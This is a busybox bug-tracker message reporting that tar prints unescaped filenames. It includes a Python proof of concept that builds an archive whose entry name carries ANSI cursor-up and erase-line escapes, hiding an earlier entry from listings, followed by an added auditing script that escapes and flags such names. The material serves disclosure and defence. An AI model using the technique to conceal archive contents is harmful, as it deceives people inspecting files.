[Bug 16018] busybox tar allows un-escaped filenames to be printed to stdout/stderr
bugzilla at busybox.net
Wed Jun 19 21:56:16 UTC 2024
https://bugs.busybox.net/show_bug.cgi?id=16018
--- Comment #2 from Ian Norton <ian.norton at entrust.com> ---
The following Python program demonstrates creating an archive with an entry
that can hide one or more previous entries from the list and verbose extract
output:
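#!/usr/bin/env python3
import tarfile

with tarfile.open("bad.tar", "w") as tf:
    # First entry: the one that ends up hidden from the listing.
    tf.add(__file__, arcname="hidden.txt")
    # Second entry: name starts with ESC[1A (cursor up) and ESC[1K (erase to
    # start of line), so printing it overwrites the previous output line.
    tf.add(__file__, arcname="\033[1A\033[1Ka-totally-innocent-filename.txt")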
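An added example, not part of the original comment or of busybox: one way to audit an archive before its listing reaches a terminal, by rendering non-printable characters in member names as visible escapes. The helper names (`escape_name`, `audit`, `build_sample`) are hypothetical, and the in-memory archive is constructed, reusing the two entry names from the comment above.

```python
import io
import tarfile


def escape_name(name: str) -> str:
    """Return the name with backslashes and non-printable characters escaped."""
    out = []
    for ch in name:
        if ch == "\\":
            out.append("\\\\")
        elif ch.isprintable():
            out.append(ch)
        else:
            # e.g. ESC (0x1b) becomes the four visible characters \x1b
            out.append(ch.encode("unicode_escape").decode("ascii"))
    return "".join(out)


def audit(archive: bytes):
    """Return (escaped_name, has_control_chars) per member, in archive order."""
    results = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
        for member in tf:
            suspicious = any(not ch.isprintable() for ch in member.name)
            results.append((escape_name(member.name), suspicious))
    return results


def build_sample() -> bytes:
    """Constructed sample: the two entry names used in the bug comment."""
    names = ("hidden.txt", "\033[1A\033[1Ka-totally-innocent-filename.txt")
    data = b"constructed sample\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name in names:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for shown, suspicious in audit(build_sample()):
        flag = "SUSPICIOUS" if suspicious else "ok"
        print(f"{flag:10} {shown}")
```

Both entries stay visible in this listing because the escape bytes are printed as text instead of being interpreted by the terminal.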